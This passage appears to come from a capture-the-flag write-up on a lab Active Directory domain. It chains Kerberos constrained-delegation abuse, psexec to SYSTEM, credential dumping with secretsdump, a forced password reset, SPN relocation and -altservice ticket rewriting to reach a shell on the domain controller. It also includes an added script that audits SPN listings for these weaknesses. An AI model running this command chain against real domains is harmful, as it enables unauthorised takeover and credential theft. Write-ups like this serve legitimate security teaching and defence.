Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache

Export the ticket and connect to WEB01 as SYSTEM:

$ export KRB5CCNAME=Administrator@cifs_web01.pirate.htb@PIRATE.HTB.ccache

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf impacket-psexec -k -no-pass Administrator@WEB01.pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on WEB01.pirate.htb.....
[*] Found writable share ADMIN$
[*] Uploading file GTiTMaAQ.exe
[*] Opening SVCManager on WEB01.pirate.htb.....
[*] Creating service KAww on WEB01.pirate.htb.....
[*] Starting service KAww.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32> whoami
nt authority\system

Privilege Escalation

Recovering a.white’s Credentials

With SYSTEM on WEB01, run secretsdump to extract locally cached credentials. The DefaultPassword entry reveals a.white's plaintext password:

$ sudo proxychains4 -q -f /etc/proxychains4-1.conf impacket-secretsdump -k -no-pass WEB01.pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

<--SNIP-->

[*] DefaultPassword
PIRATE\a.white:E2nvAOKSz5Xz2MJu

<--SNIP-->

Abusing GenericWrite to Reset a.white_adm’s Password

BloodHound analysis shows that a.white has the ability to modify a.white_adm's password. Since a.white_adm is a Kerberoast candidate with constrained delegation and is a member of the IT group, resetting its password gives us a much more privileged account:

$ bloodyAD --host pirate.htb -d pirate.htb -u 'a.white' -p 'E2nvAOKSz5Xz2MJu' set password a.white_adm 'Password@123'
[+] Password changed successfully!

SPN Manipulation for Constrained Delegation Abuse

a.white_adm has constrained delegation configured (noted in the Kerberoast output) to http/web01.pirate.htb, the SPN the getST below succeeds against. The plan is to:

  1. Remove HTTP/web01.pirate.htb from WEB01$ (addspn's -r flag removes the SPN rather than adding it), so the name can be registered elsewhere without a duplicate SPN.
  2. Add the same SPN to DC01$, so the KDC now issues tickets for http/web01.pirate.htb encrypted with DC01$'s key rather than WEB01$'s.
  3. Use getST with -altservice: the delegated ticket is requested for http/web01.pirate.htb, and because the service name sits in the unencrypted part of the ticket it can be rewritten to cifs/dc01.pirate.htb while DC01 still accepts it.

Remove HTTP/web01.pirate.htb from WEB01$ (note the -r flag):

$ addspn -u 'pirate.htb\a.white_adm' -p 'Password@123' -t 'WEB01$' -s 'http/web01.pirate.htb' -r pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Now add the same SPN to DC01$; with WEB01$ no longer holding it, the KDC will serve http/web01.pirate.htb with DC01$'s key:

$ addspn -u 'pirate.htb\a.white_adm' -p 'Password@123' -t 'DC01$' -s 'http/web01.pirate.htb' pirate.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
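
An audit over an ldapsearch SPN listing in the format shown in the LDAP enumeration section, added here as an example that is not code from the write-up or from addspn.py. It parses the entries and reports the three conditions this box turns into a compromise: user accounts carrying an SPN (Kerberoast candidates), the same SPN registered on more than one account, and an SPN that names host X but sits on an account other than X$ (the move performed above). The LDIF sample is constructed from the enumeration output plus http/web01.pirate.htb on DC01$; it assumes plain (non-base64, unfolded) attribute lines.

```python
# Added example: audit an ldapsearch SPN listing for Kerberoastable users,
# duplicate SPNs and SPNs registered on a foreign computer account.
# Not part of the write-up or of addspn.py.
from collections import defaultdict


def parse_ldif(text: str) -> list:
    """Minimal LDIF reader: one dict {attr: [values]} per blank-line-separated
    entry. Assumes no base64 (':: ') values and no line folding."""
    entries, cur = [], {}
    for line in text.splitlines():
        if not line.strip():
            if cur:
                entries.append(cur)
                cur = {}
            continue
        attr, _, value = line.partition(":")
        cur.setdefault(attr.strip(), []).append(value.strip())
    if cur:
        entries.append(cur)
    return entries


def spn_host(spn: str) -> str:
    """'HTTP/WEB01.pirate.htb:8080' -> 'web01' (short hostname, lowercase)."""
    rest = spn.split("/", 1)[1] if "/" in spn else spn
    return rest.split(":")[0].split("/")[0].split(".")[0].lower()


def audit_spns(entries) -> dict:
    owners = defaultdict(set)   # normalised SPN -> accounts holding it
    computers = {}              # lowercase short hostname -> sAMAccountName
    kerberoastable = []
    for e in entries:
        sam = e.get("sAMAccountName", [""])[0]
        if not sam:
            continue
        if sam.endswith("$"):
            computers[sam[:-1].lower()] = sam
        elif e.get("servicePrincipalName"):
            kerberoastable.append(sam)   # user account with an SPN
        for spn in e.get("servicePrincipalName", []):
            owners[spn.lower()].add(sam)   # SPN comparison is case-insensitive
    duplicates = {spn: sorted(a) for spn, a in owners.items() if len(a) > 1}
    foreign = []   # (holder, spn, account the hostname really belongs to)
    for spn, accts in owners.items():
        real_owner = computers.get(spn_host(spn))
        for acct in accts:
            if real_owner and acct != real_owner:
                foreign.append((acct, spn, real_owner))
    return {"kerberoastable": sorted(kerberoastable),
            "duplicates": duplicates,
            "foreign_host_spns": sorted(foreign)}


# Constructed sample: the enumeration output above, with http/web01.pirate.htb
# additionally present on DC01$.
SAMPLE_LDIF = """\
dn: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
sAMAccountName: a.white_adm
servicePrincipalName: ADFS/a.white

dn: CN=WEB01,CN=Computers,DC=pirate,DC=htb
sAMAccountName: WEB01$
servicePrincipalName: HOST/WEB01.pirate.htb
servicePrincipalName: HTTP/WEB01.pirate.htb

dn: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
sAMAccountName: DC01$
servicePrincipalName: HOST/DC01.pirate.htb
servicePrincipalName: http/web01.pirate.htb

dn: CN=gMSA_ADFS_prod,CN=Managed Service Accounts,DC=pirate,DC=htb
sAMAccountName: gMSA_ADFS_prod$
servicePrincipalName: host/adfs.pirate.htb
"""

if __name__ == "__main__":
    for key, value in audit_spns(parse_ldif(SAMPLE_LDIF)).items():
        print(key, value)
```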

Obtaining a Ticket for DC01

Use getST to impersonate Administrator against http/web01.pirate.htb (now served by DC01$) and let -altservice rewrite the service name to cifs/dc01.pirate.htb; the ticket stays valid because the rewritten name is outside the encrypted part, which DC01$ decrypts with its own key. The clock skew needs fixing again before this succeeds:

$ impacket-getST -spn 'http/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:Password@123' -dc-ip pirate.htb -altservice 'cifs/dc01.pirate.htb'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

$ sudo ntpdate -u pirate.htb
[sudo] password for kali:
2026-03-06 14:22:16.985185 (-0500) +316.147590 +/- 0.051894 pirate.htb 10.129.1.9 s1 no-leap
CLOCK: time stepped by 316.147590

$ impacket-getST -spn 'http/web01.pirate.htb' -impersonate 'Administrator' 'pirate.htb/a.white_adm:Password@123' -dc-ip pirate.htb -altservice 'cifs/dc01.pirate.htb'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from http/web01.pirate.htb@PIRATE.HTB to cifs/dc01.pirate.htb@PIRATE.HTB
[*] Saving ticket in Administrator@cifs_dc01.pirate.htb@PIRATE.HTB.ccache

Root Flag

Export the ticket and connect to DC01 as SYSTEM:

$ export KRB5CCNAME=Administrator@cifs_dc01.pirate.htb@PIRATE.HTB.ccache

$ impacket-psexec -k -no-pass dc01.pirate.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc01.pirate.htb.....
[*] Found writable share ADMIN$
[*] Uploading file llqXPnCp.exe
[*] Opening SVCManager on dc01.pirate.htb.....
[*] Creating service jlfX on dc01.pirate.htb.....
[*] Starting service jlfX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8385]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>